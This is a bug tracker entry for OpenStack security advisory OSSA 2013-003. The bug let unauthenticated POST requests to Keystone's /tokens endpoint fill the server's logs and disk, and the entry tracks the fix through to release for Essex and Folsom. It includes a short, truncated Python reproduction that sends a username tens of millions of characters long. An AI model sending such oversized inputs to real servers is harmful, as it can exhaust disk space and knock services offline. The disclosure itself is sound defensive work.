[OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Identity (keystone) |
Fix Released
|
High
|
Dan Prince | ||
Essex |
Fix Released
|
High
|
Dan Prince | ||
Folsom |
Fix Released
|
High
|
Dan Prince | ||
OpenStack Security Advisory |
Fix Released
|
Undecided
|
Thierry Carrez |
Bug Description
A remote unauthenticated keystone user could potentially fill up the disk on a Keystone server by running the following python script:
-------
from keystoneclient.v2_0 import client
PASSWORD='foobar'
TENANT='blah'
USER = '00000' * 9999999
keystone = client.
-----------
Running this script will increase the log file size by 100 MB per request. NOTE: This happens when running keystone at the default log levels:
# verbose = False
# debug = False
Version-Release number of selected component (if applicable):
openstack-
How reproducible:
*always*
CVE References
information type: | Private Security → Public Security |
Changed in keystone: | |
status: | In Progress → Fix Committed |
Changed in keystone: | |
status: | Fix Committed → Fix Released |
Changed in keystone: | |
milestone: | grizzly-3 → 2013.1 |
summary: |
- unauthenticated POST to /tokens can fill up disk/logs + [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs |
Changed in ossa: | |
assignee: | nobody → Thierry Carrez (ttx) |
status: | New → Fix Released |
Keystone-core, please review proposed patches (only comment on the private bug please).
@Dan: would that also affect Essex ?